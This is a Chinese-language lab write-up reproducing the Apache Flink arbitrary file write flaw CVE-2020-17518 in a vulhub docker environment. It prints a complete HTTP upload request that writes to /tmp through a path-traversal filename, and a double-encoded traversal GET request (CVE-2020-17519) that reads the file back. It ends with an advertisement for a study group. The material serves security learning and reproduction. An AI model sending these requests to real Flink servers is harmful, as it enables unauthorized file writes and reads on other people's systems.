文章来源|MS08067 WEB攻防知识星球
本文作者:L(Ms08067实验室追洞小组成员)
漏洞复现分析 认准追洞小组
一、漏洞名称:
Apache Flink 任意文件写入漏洞
二、漏洞编号:
CVE-2020-17518
三、漏洞描述:
远程攻击者通过REST API目录遍历,可造成任意文件写入的影响
四、影响版本:
1.5.1 – 1.11.2
五、漏洞分析
Flink 1.5.1版本中引入了REST API,该漏洞允许攻击者通过构造恶意的HTTP header,将上传的文件写入到本地文件系统上的任意位置
六、实验环境及准备:
实验环境使用vulhub搭建
-
cd vulhub-master/flink/CVE-2020-17518/
-
docker-compose build
-
docker-compose up -d
七、复现步骤:
目标版本为1.11.2
构造POC
-
POST
/jars/upload HTTP/1.1
-
Host: 172.16.12.144:8081
-
Accept-Encoding: gzip, deflate
-
Accept: */*
-
Accept-Language: en
-
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
-
Connection: close
-
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
-
Content-Length: 179
-
-
-
------WebKitFormBoundaryoZ8meKnrrso89R6Y
-
Content-Disposition: form-data; name=
"jarfile"; filename=
"../../../../../../tmp/test"
-
-
-
test
-
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
-
尽管响应码为400,并且出现报错信息,但实际上我们的文件依然是上传成功的
利用CVE-2020-17519(Apache Flink Version:1.11.0,1.11.1,1.11.2任意文件读取漏洞)验证文件是否写入成功
-
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252ftest HTTP/
1.1
-
Host:
172.16.
12.144:
8081
-
Cache-Control: max-age=
0
-
Upgrade-Insecure-Requests:
1
-
User-Agent: Mozilla/
5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/
537.36 (KHTML, like Gecko) Chrome/
79.0.
3945.130 Safari/
537.36
-
Accept: text/html,application/xhtml+xml,application/xml;
q=
0.
9,image/webp,image/apng,*
/*;q=0.8,application/signed-exchange;v=b3;
q=
0.
9
-
Accept-Encoding: gzip, deflate
-
Accept-Language: zh-CN,zh;
q=
0.
9
-
Connection:
close
成功写入
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
目前36000+人已关注加入我们
转载:https://blog.csdn.net/shuteer_xu/article/details/114006265
查看评论